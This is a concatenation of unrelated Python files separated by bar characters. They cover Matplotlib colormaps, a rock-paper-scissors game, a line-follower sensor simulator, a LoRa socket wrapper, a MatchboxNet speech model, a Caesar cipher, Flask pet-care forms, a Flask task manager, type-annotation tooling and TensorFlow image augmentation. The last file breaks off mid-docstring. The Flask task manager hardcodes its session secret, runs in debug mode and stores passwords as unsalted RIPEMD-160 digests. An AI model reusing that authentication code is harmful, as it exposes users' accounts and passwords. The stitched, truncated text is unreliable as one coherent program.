"""
This module contains utility functions that enhance Matplotlib
in one way or another.
"""
__all__ = ['wigner_cmap', 'MidpointNorm', 'complex_phase_cmap']
import numpy as np
try:
import matplotlib as mpl
from matplotlib import cm
from matplotlib.colors import (Normalize, ColorConverter)
except ImportError:
class Normalize(object):
def __init__(self, vmin=None, vmax=None, clip=False):
pass
def wigner_cmap(W, levels=1024, shift=0, max_color='#09224F',
mid_color='#FFFFFF', min_color='#530017',
neg_color='#FF97D4', invert=False):
"""A custom colormap that emphasizes negative values by creating a
nonlinear colormap.
Parameters
----------
W : array
Wigner function array, or any array.
levels : int
Number of color levels to create.
shift : float
Shifts the value at which Wigner elements are emphasized.
        This parameter should typically be negative and small (e.g., -1e-5).
max_color : str
String for color corresponding to maximum value of data. Accepts
any string format compatible with the Matplotlib.colors.ColorConverter.
mid_color : str
Color corresponding to zero values. Accepts any string format
compatible with the Matplotlib.colors.ColorConverter.
min_color : str
Color corresponding to minimum data values. Accepts any string format
compatible with the Matplotlib.colors.ColorConverter.
neg_color : str
Color that starts highlighting negative values. Accepts any string
format compatible with the Matplotlib.colors.ColorConverter.
invert : bool
Invert the color scheme for negative values so that smaller negative
values have darker color.
Returns
-------
Returns a Matplotlib colormap instance for use in plotting.
Notes
-----
The 'shift' parameter allows you to vary where the colormap begins
to highlight negative colors. This is beneficial in cases where there
are small negative Wigner elements due to numerical round-off and/or
truncation.
"""
cc = ColorConverter()
max_color = np.array(cc.to_rgba(max_color), dtype=float)
mid_color = np.array(cc.to_rgba(mid_color), dtype=float)
if invert:
min_color = np.array(cc.to_rgba(neg_color), dtype=float)
neg_color = np.array(cc.to_rgba(min_color), dtype=float)
else:
min_color = np.array(cc.to_rgba(min_color), dtype=float)
neg_color = np.array(cc.to_rgba(neg_color), dtype=float)
# get min and max values from Wigner function
bounds = [W.min(), W.max()]
# create empty array for RGBA colors
adjust_RGBA = np.hstack((np.zeros((levels, 3)), np.ones((levels, 1))))
zero_pos = int(np.round(levels * np.abs(shift - bounds[0])
/ (bounds[1] - bounds[0])))
num_pos = levels - zero_pos
num_neg = zero_pos - 1
# set zero values to mid_color
adjust_RGBA[zero_pos] = mid_color
# interpolate colors
for k in range(0, levels):
if k < zero_pos:
interp = k / (num_neg + 1.0)
adjust_RGBA[k][0:3] = (1.0 - interp) * \
min_color[0:3] + interp * neg_color[0:3]
elif k > zero_pos:
interp = (k - zero_pos) / (num_pos + 1.0)
adjust_RGBA[k][0:3] = (1.0 - interp) * \
mid_color[0:3] + interp * max_color[0:3]
# create colormap
wig_cmap = mpl.colors.LinearSegmentedColormap.from_list('wigner_cmap',
adjust_RGBA,
N=levels)
return wig_cmap
def complex_phase_cmap():
"""
Create a cyclic colormap for representing the phase of complex variables
Returns
-------
    cmap : matplotlib.colors.LinearSegmentedColormap
A matplotlib linear segmented colormap.
"""
cdict = {'blue': ((0.00, 0.0, 0.0),
(0.25, 0.0, 0.0),
(0.50, 1.0, 1.0),
(0.75, 1.0, 1.0),
(1.00, 0.0, 0.0)),
'green': ((0.00, 0.0, 0.0),
(0.25, 1.0, 1.0),
(0.50, 0.0, 0.0),
(0.75, 1.0, 1.0),
(1.00, 0.0, 0.0)),
'red': ((0.00, 1.0, 1.0),
(0.25, 0.5, 0.5),
(0.50, 0.0, 0.0),
(0.75, 0.0, 0.0),
(1.00, 1.0, 1.0))}
cmap = mpl.colors.LinearSegmentedColormap('phase_colormap', cdict, 256)
return cmap
class MidpointNorm(Normalize):
"""Normalization for a colormap centered about a given midpoint.
Parameters
----------
midpoint : float (optional, default=0)
Midpoint about which colormap is centered.
vmin: float (optional)
Minimal value for colormap. Calculated from data by default.
vmax: float (optional)
Maximal value for colormap. Calculated from data by default.
Returns
-------
Returns a Matplotlib colormap normalization that can be used
with any colormap.
"""
def __init__(self, midpoint=0, vmin=None, vmax=None, clip=False):
self.midpoint = midpoint
Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y))
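# A brief usage sketch (illustrative only, not part of the original module):
# plot a toy array with negative and positive values using wigner_cmap()
# together with the midpoint-centered normalization defined above.
if __name__ == "__main__":
    import matplotlib.pyplot as plt

    x = np.linspace(-3, 3, 200)
    X, Y = np.meshgrid(x, x)
    # a Gaussian bump minus a smaller, offset one, so W has negative regions
    W = np.exp(-(X ** 2 + Y ** 2)) - 0.5 * np.exp(-((X - 1) ** 2 + Y ** 2))

    fig, ax = plt.subplots()
    cmap = wigner_cmap(W)
    norm = MidpointNorm(midpoint=0, vmin=W.min(), vmax=W.max())
    mesh = ax.pcolormesh(X, Y, W, cmap=cmap, norm=norm)
    fig.colorbar(mesh, ax=ax)
    plt.show()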
|
from random import randint
from time import sleep
itens = ('Pedra', 'Papel', 'Tesoura')
computador = randint(0, 2)
print('''\033[1;97;40mSuas opções:\033[49m
\033[92;40m[ 0 ] \033[93mPEDRA\033[49m
\033[92;40m[ 1 ] \033[93mPAPEL\033[49m
\033[92;40m[ 2 ] \033[93mTESOURA\033[49m''')
jogador = -1
while jogador < 0 or jogador > 2:
jogador = int(input('\033[97;40mQual é a sua jogada? '))
if jogador < 0 or jogador > 2:
print('\033[49m\n\033[91;40mJogada inválida. Tente novamente!\033[49m\n')
print('\033[49m\n\033[40mJO', end='')
sleep(0.5)
print('KEN', end='')
sleep(0.5)
print('PO!!!\033[49m')
sleep(1)
print('\033[49m' + '\033[95m-~' * 12)
print('\033[94mComputador jogou \033[96m{}\033[94m!'.format(itens[computador]))
print('Jogador jogou \033[96m{}\033[94m!'.format(itens[jogador]))
print('\033[95m-~' * 12)
if computador == 0:
if jogador == 0:
print('\033[96mEMPATOU\033[94m!')
elif jogador == 1:
print('\033[94mO jogador \033[96mGANHOU\033[94m!')
else:
print('\033[94mO computador \033[96mGANHOU\033[94m!')
elif computador == 1:
if jogador == 0:
print('\033[94mO computador \033[96mGANHOU\033[94m!')
elif jogador == 1:
print('\033[96mEMPATOU\033[94m!')
else:
print('\033[94mO jogador \033[96mGANHOU\033[94m!')
else:
if jogador == 0:
print('\033[94mO jogador \033[96mGANHOU\033[94m!')
elif jogador == 1:
print('\033[94mO computador \033[96mGANHOU\033[94m!')
else:
print('\033[96mEMPATOU\033[94m!')
|
#!/usr/bin/python3
# coding: UTF-8
"""
フォトリフレクタクラス
「電子情報通信設計製図」新潟大学工学部工学科電子情報通信プログラム
All rights revserved 2019-2020 (c) Shogo MURAMATSU
"""
import pygame
class LFPhotoReflector:
""" フォトリフレクタクラス
フォトリフレクタの応答を模擬しています。
ノイズを加えたり応答をスケールするなど、
実機のフォトリフレクタに合わせた調整は、
この部分で行うとよいでしょう。
"""
    ACTIVE_WHITE = True # 1 on white, 0 on black; reversed when False
def __init__(self,course,value = 0.0):
self._course = course
self._value = value
self._pos_px = [0.0, 0.0]
@property
def value(self):
return self.measurement()
@value.setter
def value(self,value):
self._value = value
@property
def pos_px(self):
return self._pos_px
@pos_px.setter
def pos_px(self,pos_px):
self._pos_px = pos_px
def measurement(self):
        # return the value around the sensor position
x_px = int(self._pos_px[0]+0.5)
y_px = int(self._pos_px[1]+0.5)
if 1 < y_px and y_px < self._course.height-1 and \
1 < x_px and x_px < self._course.width-1:
pxarray = pygame.PixelArray(self._course.image)
            # output the average over a 3x3 region
acc = 0.0
for row in range(-1,2):
for col in range(-1,2):
acc = acc + float(pxarray[x_px+col][y_px+row] > 0)
if LFPhotoReflector.ACTIVE_WHITE:
                value = acc/9.0 # mean value
else:
                value = 1.0 - acc/9.0 # mean value
else:
value = 0.5
return value
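# A minimal, self-contained usage sketch (not part of the original simulator):
# it assumes only a stand-in "course" object exposing image, width and height,
# which is what measurement() reads. The real course object comes from the
# line-following simulator used in the exercise.
if __name__ == "__main__":
    class _DummyCourse:
        def __init__(self, width=100, height=100):
            self.width = width
            self.height = height
            self.image = pygame.Surface((width, height), depth=32)
            self.image.fill((255, 255, 255))  # an all-white course

    sensor = LFPhotoReflector(_DummyCourse())
    sensor.pos_px = [50.0, 50.0]
    print(sensor.value)  # approximately 1.0 on a white surface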
|
from .pyutils.version import get_version
try:
# This variable is injected in the __builtins__ by the build
    # process. It is used to enable importing subpackages when
# the required packages are not installed
__SETUP__ # type: ignore
except NameError:
__SETUP__ = False
VERSION = (2, 0, 0, 'alpha', 0)
__version__ = get_version(VERSION)
if not __SETUP__:
from .promise import (
Promise,
promise_for_dict,
promisify,
is_thenable,
async_instance,
get_default_scheduler,
set_default_scheduler
)
from .scheduler import SyncScheduler, ThreadScheduler
__all__ = [
'Promise',
'promise_for_dict',
'promisify',
'is_thenable',
'async_instance',
'get_default_scheduler',
'set_default_scheduler',
'SyncScheduler',
'ThreadScheduler'
]
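# A short usage sketch of the exported API (illustrative only; it assumes the
# usual promise-library pattern of an executor function plus .then()/.get()):
#
#     from promise import Promise, is_thenable
#
#     p = Promise(lambda resolve, reject: resolve(42))
#     assert is_thenable(p)
#     print(p.then(lambda v: v + 1).get())  # 43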
|
# Need to import the plotting package:
import matplotlib.pyplot as plt
import numpy as np
import sys
FILENAME = sys.argv[1]
# Read the file.
f2 = open(FILENAME, 'r')
# read the whole file into a single variable,
# which is a list of every row of the file.
lines = f2.readlines()
f2.close()
# initialize some variable to be lists:
x1 = []
y1 = []
# scan the rows of the file stored in lines,
# and put the values into some variables:
for line in lines:
p = line.split(',')
x1.append(float(p[0]))
y1.append(float(p[1]))
xv = np.array(x1)
yv = np.array(y1)
# now, plot the data:
plt.plot(xv, yv)
# Set up axis labels, title, and grid
plt.xlabel('Iterations')
plt.ylabel('Value')
plt.title('Learning Automata behavior')
plt.grid(True)
plt.show()
|
# coding: utf-8
from __future__ import unicode_literals
import logging
from wxpy.utils import handle_response
from .user import User
logger = logging.getLogger(__name__)
class Friend(User):
"""
好友对象
"""
@handle_response()
def set_remark_name(self, remark_name):
"""
设置或修改好友的备注名称
:param remark_name: 新的备注名称
"""
logger.info('setting remark name for {}: {}'.format(self, remark_name))
return self.bot.core.set_alias(userName=self.user_name, alias=str(remark_name))
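# A rough usage sketch (illustrative; logging in with wxpy requires scanning
# a QR code, and the friend name below is made up):
#
#     from wxpy import Bot
#
#     bot = Bot()
#     friend = bot.friends().search('Alice')[0]
#     friend.set_remark_name('Alice (college)')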
|
import _thread
import socket
import ubinascii, network
from network import LoRa
from LoRaMeshLibrary.ReceiveBuffer import ReceiveBuffer
class ThreadSafeLoraSocket:
def __init__(self):
self.socketLock = _thread.allocate_lock()
self.lora = LoRa(mode=LoRa.LORA, region=LoRa.EU868)
self.lora_sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)
self.lora_sock.setblocking(True)
def send(self, bytes):
self.socketLock.acquire(1)
self.lora_sock.setblocking(True)
self.lora_sock.send(bytes)
self.socketLock.release()
def receive(self):
self.socketLock.acquire(1)
self.lora_sock.setblocking(False)
data = self.lora_sock.recv(ReceiveBuffer.BUFFER_SIZE)
loraStats = self.lora.stats()
self.socketLock.release()
return (data, loraStats)
def getMac(self):
return ubinascii.hexlify(self.lora.mac())[15]
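# A brief usage sketch (Pycom/MicroPython hardware only; assumes the
# ReceiveBuffer.BUFFER_SIZE constant from LoRaMeshLibrary is defined):
#
#     lora_socket = ThreadSafeLoraSocket()
#     lora_socket.send(b'hello mesh')
#     data, stats = lora_socket.receive()
#     print(lora_socket.getMac(), data, stats)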
|
"""
# !/usr/bin/env python
-*- coding: utf-8 -*-
@Time : 2022/6/4 下午4:26
@Author : Yang "Jan" Xiao
@Description :
reference:https://github.com/dominickrei/MatchboxNet
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchaudio.transforms import MFCC
from utils.utils import padding
class TCSConv(nn.Module):
'''
    An implementation of Time-channel Separable Convolution
**Arguments**
in_channels : int
The number of input channels to the layers
out_channels : int
The requested number of output channels of the layers
kernel_size : int
The size of the convolution kernel
Example
-------
>>> inputs = torch.randn(1, 64, 400)
>>> tcs_layer = TCSConv(64, 128, 11)
>>> features = tcs_layer(inputs)
>>> features.shape
torch.Size([1, 128, 400])
'''
def __init__(self, in_channels, out_channels, kernel_size):
super(TCSConv, self).__init__()
self.depthwise_conv = nn.Conv1d(in_channels, in_channels, kernel_size, groups=in_channels,
padding='same') # effectively performing a depthwise convolution
self.pointwise_conv = nn.Conv1d(in_channels, out_channels,
kernel_size=1) # effectively performing a pointwise convolution
def forward(self, x):
x = self.depthwise_conv(x)
x = self.pointwise_conv(x)
return x
class SubBlock(nn.Module):
'''
An implementation of a sub-block that is repeated R times
**Arguments**
in_channels : int
The number of input channels to the layers
out_channels : int
The requested number of output channels of the layers
kernel_size : int
The size of the convolution kernel
residual : None or torch.Tensor
Only applicable for the final sub-block. If not None, will add 'residual' after batchnorm layer
Example
-------
>>> inputs = torch.randn(1, 128, 600)
>>> subblock = SubBlock(128, 64, 13)
>>> outputs = subblock(inputs)
>>> outputs.shape
torch.Size([1, 64, 600])
'''
def __init__(self, in_channels, out_channels, kernel_size):
super(SubBlock, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.tcs_conv = TCSConv(self.in_channels, self.out_channels, self.kernel_size)
self.bnorm = nn.BatchNorm1d(self.out_channels)
self.dropout = nn.Dropout()
def forward(self, x, residual=None):
x = self.tcs_conv(x)
x = self.bnorm(x)
# apply the residual if passed
if residual is not None:
x = x + residual
x = F.relu(x)
x = self.dropout(x)
return x
class MainBlock(nn.Module):
'''
An implementation of the residual block containing R repeating sub-blocks
**Arguments**
in_channels : int
The number of input channels to the residual block
out_channels : int
The requested number of output channels of the sub-blocks
kernel_size : int
The size of the convolution kernel
R : int
The number of repeating sub-blocks contained within this residual block
residual : None or torch.Tensor
Only applicable for the final sub-block. If not None, will add 'residual' after batchnorm layer
Example
-------
>>> inputs = torch.randn(1, 128, 300)
>>> block = MainBlock(128, 64, 13, 3)
>>> outputs = block(inputs)
>>> outputs.shape
torch.Size([1, 64, 300])
'''
def __init__(self, in_channels, out_channels, kernel_size, R=1):
super(MainBlock, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.residual_pointwise = nn.Conv1d(self.in_channels, self.out_channels, kernel_size=1)
self.residual_batchnorm = nn.BatchNorm1d(self.out_channels)
self.sub_blocks = nn.ModuleList()
# Initial sub-block. If this is MainBlock 1, our input will be 128 channels which may not necessarily == out_channels
self.sub_blocks.append(
SubBlock(self.in_channels, self.out_channels, self.kernel_size)
)
# Other sub-blocks. Output of all of these blocks will be the same
for i in range(R - 1):
self.sub_blocks.append(
SubBlock(self.out_channels, self.out_channels, self.kernel_size)
)
def forward(self, x):
residual = self.residual_pointwise(x)
residual = self.residual_batchnorm(residual)
for i, layer in enumerate(self.sub_blocks):
if (i + 1) == len(self.sub_blocks): # compute the residual in the final sub-block
x = layer(x, residual)
else:
x = layer(x)
return x
class MatchboxNet(nn.Module):
'''
An implementation of MatchboxNet (https://arxiv.org/abs/2004.08531)
The input is expected to be 64 channel MFCC features
**Arguments**
B : int
The number of residual blocks in the model
R : int
The number of sub-blocks within each residual block
C : int
The size of the output channels within a sub-block
kernel_sizes : None or list
If None, kernel sizes will be assigned to values used in the paper. Otherwise kernel_sizes will be used
len(kernel_sizes) must equal the number of blocks (B)
NUM_CLASSES : int
The number of classes in the dataset (i.e. number of keywords.) Defaults to 30 to match the Google Speech Commands Dataset
Example
-------
>>> inputs = torch.randn(1, 64, 500)
>>> model = MatchboxNet(B=3, R=2, C=64,bins=64, NUM_CLASSES=30)
>>> outputs = model(inputs)
>>> outputs.shape
torch.Size([1, 30])
'''
def __init__(self, B, R, C, bins=64, kernel_sizes=None, NUM_CLASSES=30):
super(MatchboxNet, self).__init__()
if not kernel_sizes:
kernel_sizes = [k * 2 + 11 for k in range(1, 5 + 1)] # incrementing kernel size by 2 starting at 13
# the prologue layers
self.prologue_conv1 = nn.Conv1d(bins, 128, kernel_size=11, stride=2)
self.prologue_bnorm1 = nn.BatchNorm1d(128)
# the intermediate blocks
self.blocks = nn.ModuleList()
self.blocks.append(
MainBlock(128, C, kernel_sizes[0], R=R)
)
for i in range(1, B):
self.blocks.append(
MainBlock(C, C, kernel_size=kernel_sizes[i], R=R)
)
# the epilogue layers
self.epilogue_conv1 = nn.Conv1d(C, 128, kernel_size=29, dilation=2)
self.epilogue_bnorm1 = nn.BatchNorm1d(128)
self.epilogue_conv2 = nn.Conv1d(128, 128, kernel_size=1)
self.epilogue_bnorm2 = nn.BatchNorm1d(128)
self.epilogue_conv3 = nn.Conv1d(128, NUM_CLASSES, kernel_size=1)
# Pool the timesteps into a single dimension using simple average pooling
self.epilogue_adaptivepool = nn.AdaptiveAvgPool1d(1)
def forward(self, x):
# prologue block
x = self.prologue_conv1(x)
x = self.prologue_bnorm1(x)
x = F.relu(x)
# intermediate blocks
for layer in self.blocks:
x = layer(x)
# epilogue blocks
x = self.epilogue_conv1(x)
x = self.epilogue_bnorm1(x)
x = self.epilogue_conv2(x)
x = self.epilogue_bnorm2(x)
x = self.epilogue_conv3(x)
x = self.epilogue_adaptivepool(x)
x = x.squeeze(2) # (N, 30, 1) > (N, 30)
x = F.softmax(x, dim=1) # softmax across classes and not batch
return x
class MFCC_MatchboxNet(nn.Module):
def __init__(self, bins: int, B: int, R: int, n_channels, kernel_sizes=None, num_classes=12):
super(MFCC_MatchboxNet, self).__init__()
self.sampling_rate = 16000
self.bins = bins
self.num_classes = num_classes
self.mfcc_layer = MFCC(sample_rate=self.sampling_rate, n_mfcc=self.bins, log_mels=True)
self.matchboxnet = MatchboxNet(B, R, n_channels, bins=self.bins, kernel_sizes=kernel_sizes,
NUM_CLASSES=num_classes)
def forward(self, waveform):
        mel_spectrogram = self.mfcc_layer(waveform)
        mel_spectrogram = mel_spectrogram.squeeze(1)
        mel_spectrogram = padding(mel_spectrogram, 128)
        logits = self.matchboxnet(mel_spectrogram)
return logits
if __name__ == "__main__":
inputs = torch.randn(128, 64, 50)
inputs = padding(inputs, 128)
model = MatchboxNet(B=3, R=2, C=64, bins=64, NUM_CLASSES=30)
outputs = model(inputs)
print(outputs.shape)
|
# Back end of cypher
import collections
import string
def moduleTest(name):
print("Hello World!")
print("Hello " + name + ", how old art thu?")
def encrypt(word, rotationnum):
if word and rotationnum != "":
alphLib = collections.deque(string.ascii_lowercase)
word = word.lower()
rotationNum = int(rotationnum)
alphLib.rotate(rotationNum)
alphLib = ''.join(list(alphLib))
secret = ''
for letter in word:
if letter in string.ascii_lowercase:
position = string.ascii_lowercase.index(letter)
newletter = alphLib[position]
secret = secret + newletter
else:
secret = secret + letter
else:
secret = "Invalid Input... :("
return secret
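# A quick usage sketch of the Caesar-style encrypt() helper above
# (inputs are made up; run this file directly to see the output):
if __name__ == "__main__":
    print(encrypt("Hello, World", "3"))  # letters are shifted; other characters pass through
    print(encrypt("", ""))               # prints "Invalid Input... :("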
|
from datetime import date
from flask_wtf import FlaskForm
from flask_wtf.file import FileField
from wtforms import (
IntegerField,
PasswordField,
RadioField,
SelectField,
StringField,
SubmitField,
)
from wtforms.fields.html5 import DateField
from wtforms.validators import (
DataRequired,
Email,
EqualTo,
InputRequired,
Length,
Optional,
)
from petsrus.forms.validators import ExistingName, FutureDate, PastDate
from petsrus.models.models import Repeat, RepeatCycle, ScheduleType
class RegistrationForm(FlaskForm):
username = StringField(
"Username:",
validators=[
InputRequired(message="Please enter your username"),
Length(
min=4,
max=25,
message="Username must be between 4 to 25 characters in length",
),
],
)
password = PasswordField(
"Password:",
validators=[
InputRequired(message="Please enter your password"),
EqualTo("confirm_password", message="Passwords must match"),
            Length(min=8, message="Password should be at least 8 characters in length"),
],
)
confirm_password = PasswordField("Confirm password:")
email_address = StringField(
"Email address:",
validators=[
InputRequired(message="Please enter your email address"),
Email(message="Please enter a valid email address"),
Length(min=6, max=35),
],
)
telephone = StringField("Telephone:")
country = StringField("Country:")
register = SubmitField("Register")
class LoginForm(FlaskForm):
username = StringField(
"Username:", validators=[InputRequired(message="Please enter your username")]
)
password = PasswordField(
"Password:", validators=[InputRequired(message="Please enter your password")]
)
login = SubmitField("Login")
class PetForm(FlaskForm):
name = StringField(
"Name:",
validators=[
InputRequired(message="Please enter a name"),
Length(
min=2,
max=24,
message="Name must be between 2 to 25 characters in length",
),
],
)
date_of_birth = DateField(
"Date of Birth:",
format="%Y-%m-%d",
validators=[
DataRequired(message="Please enter a Date of Birth (YYYY-MM-DD)"),
PastDate(message="Please enter a date before {}".format(date.today())),
],
)
species = StringField(
"Species:",
validators=[
InputRequired(message="Please provide species details"),
Length(
min=4,
max=10,
message="Species must be between 4 to 10 characters in length",
),
],
)
breed = StringField(
"Breed:",
validators=[
InputRequired(message="Please provide breed details"),
Length(
min=5,
max=25,
message="Breed must be between 5 to 25 characters in length",
),
],
)
sex = StringField(
"Sex:",
validators=[
InputRequired(message="Please provide pet sex details"),
Length(min=1, max=1, message="Enter M or F for sex"),
],
)
colour_and_identifying_marks = StringField("Colour and identifying marks:")
save = SubmitField("Save")
class PetScheduleForm(FlaskForm):
pet_id = IntegerField("Pet id")
date_of_next = DateField(
"Date of Next:",
format="%Y-%m-%d",
validators=[
InputRequired(message="Please enter the Date (YYYY-MM-DD)"),
FutureDate(
message="Please enter a date greater than today {}".format(date.today())
),
],
)
repeats = RadioField(
"Repeats:",
choices=Repeat.__values__,
validators=[InputRequired(message="Please select either Yes or No")],
)
repeat_cycle = RadioField(u"Repeat Cycle:", coerce=int, validators=[Optional()])
schedule_type = SelectField(u"Schedule Types", coerce=int)
save = SubmitField("Save")
class ChangePetPhotoForm(FlaskForm):
photo = FileField()
save = SubmitField("Upload Photo")
class RepeatCycleForm(FlaskForm):
repeat_cycle_name = StringField(
"Name:",
validators=[
InputRequired(message="Please provide a Repeat Cycle eg Daily, Weekly etc"),
Length(
min=5,
max=20,
message="Name must be between 5 to 20 characters in length",
),
ExistingName(
RepeatCycle, message="Sorry, this Repeat Cycle already exists"
),
],
)
save = SubmitField("Add Repeat Cycle")
class ScheduleTypeForm(FlaskForm):
schedule_type_name = StringField(
"Name:",
validators=[
InputRequired(
message="Please provide a Schedule Type eg Deworming, Vaccine etc"
),
Length(
min=5,
max=20,
message="Name must be between 5 to 20 characters in length",
),
ExistingName(
ScheduleType, message="Sorry, this Schedule Type already exists"
),
],
)
save = SubmitField("Add Schedule Type")
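# A rough sketch of how RegistrationForm might be wired into a Flask view
# (the route name, template, and save_user() helper are assumptions, not
# taken from this file):
#
#     @app.route("/register", methods=["GET", "POST"])
#     def register():
#         form = RegistrationForm()
#         if form.validate_on_submit():
#             save_user(form.username.data, form.password.data)  # hypothetical helper
#             return redirect(url_for("login"))
#         return render_template("register.html", form=form)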
|
from flask import Flask
from flask import request
from flask import render_template
from flask import url_for
from flask import redirect
from flask import jsonify
from flask import session
from flask import flash
import hashlib, binascii
import sqlite3
app = Flask(__name__)
conn = None
# Get the current connection
def get_conn():
global conn
if conn is None:
conn = sqlite3.connect('database.sql')
# Dictionary results
conn.row_factory = sqlite3.Row
return conn
# Close the connection
def close_connection():
    global conn
    if conn is not None:
        conn.close()
        conn = None
# Query the database from the connection
def query_db(query, args=(), one=False):
cur = get_conn().cursor()
cur.execute(query, args)
r = cur.fetchall()
cur.close()
return (r[0] if r else None) if one else r
# Add a task to the database
def add_task(category, priority, description):
query_db('INSERT INTO tasks values(?, ?, ?)', (category, priority, description), one=True)
get_conn().commit()
# Delete task from database
def delete_task(rowid):
    query_db('DELETE FROM tasks WHERE rowid=(?)', (rowid,))
get_conn().commit()
# Validate the username and password
def validate(username, password):
    # RIPEMD-160 is used as a smaller digest than SHA256 or SHA512
    dk = hashlib.new('ripemd160')
    dk.update(password.encode('utf-8'))
    password = dk.hexdigest()
    return query_db('SELECT * from users where username=(?) and password=(?)', (username, password), one=True)
#Adding and getting tasks
@app.route('/', methods=['GET', 'POST'])
def tasks():
if request.method == "POST" and 'logged_in' in session:
category = request.form['category']
priority = request.form['priority']
description = request.form['description']
add_task(category, priority, description)
flash('New task was successfully added')
return redirect(url_for('tasks'))
else:
tasks = query_db('SELECT rowid, * FROM tasks ORDER BY priority DESC')
return render_template('index.html', tasks=tasks)
#Logging in
@app.route('/login', methods=['POST'])
def login():
username = request.form['username']
password = request.form['password']
if (validate(username, password)):
session['logged_in'] = True
flash("Login Successful")
else:
flash('Error: Invalid Password')
return redirect(url_for('tasks'))
# Logout, clear session information
@app.route('/logout', methods=['GET'])
def logout():
session.clear()
return redirect(url_for('tasks'))
# Delete a task
@app.route('/delete', methods=['POST'])
def delete():
if 'logged_in' in session and session['logged_in']:
rowid = request.form['rowid']
delete_task(rowid)
flash('Deleted task successfully')
return jsonify({'status': True})
else:
return jsonify({'status': False})
if __name__ == "__main__":
# Really lame keys and startup
app.secret_key = 'something really secret'
app.config['SESSION_TYPE'] = 'filesystem'
app.debug = True
app.run()
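# A possible schema for the two tables this app queries (an assumption, not
# shipped with this file); something like the following, run once against
# database.sql, would satisfy the SELECT/INSERT/DELETE statements above.
# Passwords are stored as RIPEMD-160 hex digests, matching validate():
#
#     CREATE TABLE tasks (category TEXT, priority INTEGER, description TEXT);
#     CREATE TABLE users (username TEXT, password TEXT);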
|
"""Main entry point to mypy annotation inference utility."""
import json
from typing import List
from typing_extensions import TypedDict
from typewriter.annotations.infer import infer_annotation
from typewriter.annotations.parse import parse_json
from typewriter.annotations.types import ARG_STAR, ARG_STARSTAR
# Schema of a function signature in the output
Signature = TypedDict('Signature', {'arg_types': List[str],
'return_type': str})
# Schema of a function in the output
FunctionData = TypedDict('FunctionData', {'path': str,
'line': int,
'func_name': str,
'signature': Signature,
'samples': int})
SIMPLE_TYPES = {'None', 'int', 'float', 'str', 'bytes', 'bool'}
def unify_type_comments(type_comments):
# type: (List[str]) -> Signature
arg_types, return_type = infer_annotation(type_comments)
arg_strs = []
for arg, kind in arg_types:
arg_str = str(arg)
if kind == ARG_STAR:
arg_str = '*%s' % arg_str
elif kind == ARG_STARSTAR:
arg_str = '**%s' % arg_str
arg_strs.append(arg_str)
return {
'arg_types': arg_strs,
'return_type': str(return_type),
}
def is_signature_simple(signature):
# type: (Signature) -> bool
return (all(x.lstrip('*') in SIMPLE_TYPES for x in signature['arg_types']) and
signature['return_type'] in SIMPLE_TYPES)
def generate_annotations_json_string(source_path, only_simple=False):
# type: (str, bool) -> List[FunctionData]
"""Produce annotation data JSON file from a JSON file with runtime-collected types.
Data formats:
* The source JSON is a list of typewriter.annotations.parse.RawEntry items.
* The output JSON is a list of FunctionData items.
"""
items = parse_json(source_path)
results = []
for item in items:
signature = unify_type_comments(item.type_comments)
if is_signature_simple(signature) or not only_simple:
data = {
'path': item.path,
'line': item.line,
'func_name': item.func_name,
'signature': signature,
'samples': item.samples
} # type: FunctionData
results.append(data)
return results
def generate_annotations_json(source_path, target_path, only_simple=False):
# type: (str, str, bool) -> None
"""Like generate_annotations_json_string() but writes JSON to a file."""
results = generate_annotations_json_string(source_path, only_simple=only_simple)
with open(target_path, 'w') as f:
json.dump(results, f, sort_keys=True, indent=4)
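# A minimal usage sketch (file names are hypothetical): convert a JSON file of
# runtime-collected type comments into the FunctionData format defined above.
if __name__ == '__main__':
    generate_annotations_json('type_info.json', 'annotations.json', only_simple=False)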
|
import tensorflow as tf
import tensorflow_addons as tfa
from numpy import pi
def rotate_images(ds):
"""
    Rotate images by 90, 180, and 270 degrees. Returns the three rotated copies
    (three times the input size); concatenate with the original dataset to quadruple it.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_rotated_90 = ds.map(lambda x,y: (tfa.image.rotate(x, angles=0.5*pi), y))
ds_rotated_180 = ds.map(lambda x,y: (tfa.image.rotate(x, angles=pi), y))
ds_rotated_270 = ds.map(lambda x,y: (tfa.image.rotate(x, angles=1.5*pi), y))
ds = ds_rotated_90.concatenate(ds_rotated_180).concatenate(ds_rotated_270)
return ds
def apply_mean_filter(ds, filter_shape=7):
"""
Perform mean filtering on images. Replace image values by mean of neighbouring values,
effectively introducing a blur and reducing sharpness of the image.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
filter_shape (int): size of the filter with which to perform the convolution. Default: 7 (7x7 filter size)
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_mean_filtered = ds.map(lambda x,y: (tfa.image.mean_filter2d(x, filter_shape=filter_shape), y))
return ds_mean_filtered
def apply_gaussian_filter(ds, filter_shape=7, sigma=2.0):
"""
Apply a Gaussian image blur. Replace image values by neighbouring values, weighted by a Gaussian function.
    The returned dataset has the same size as the input; concatenate it with the original to double the data.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
filter_shape (int): size of the filter with which to perform the convolution. Default: 7 (7x7 filter size)
sigma (float): standard deviation of the Gaussian function in both x and y direction. Default: 2.0
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_gaussian = ds.map(lambda x,y: (tfa.image.gaussian_filter2d(x, filter_shape=filter_shape, sigma=sigma), y))
return ds_gaussian
def random_hsv(ds):
"""
Randomly adjust hue, saturation, value of an RGB image in the YIQ color space.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
Returns:
ds (TensorFlow dataset): augmented dataset
"""
ds_hsv = ds.map(lambda x,y: (tfa.image.random_hsv_in_yiq(x, max_delta_hue=0.8, lower_saturation=0.2, upper_saturation=0.8, lower_value=0.2, upper_value=0.8), y))
return ds_hsv
def add_noise(ds, sd=0.2):
"""
Add randomly sampled noise to image values. Clip afterwards to ensure values stay in range [0,1].
Sample from normal distribution.
Args:
ds (TensorFlow dataset): image dataset on which to perform the augmentation
sd (float): standard deviation of the normal distribution. Higher values = more noise, Default: 0.2
Returns:
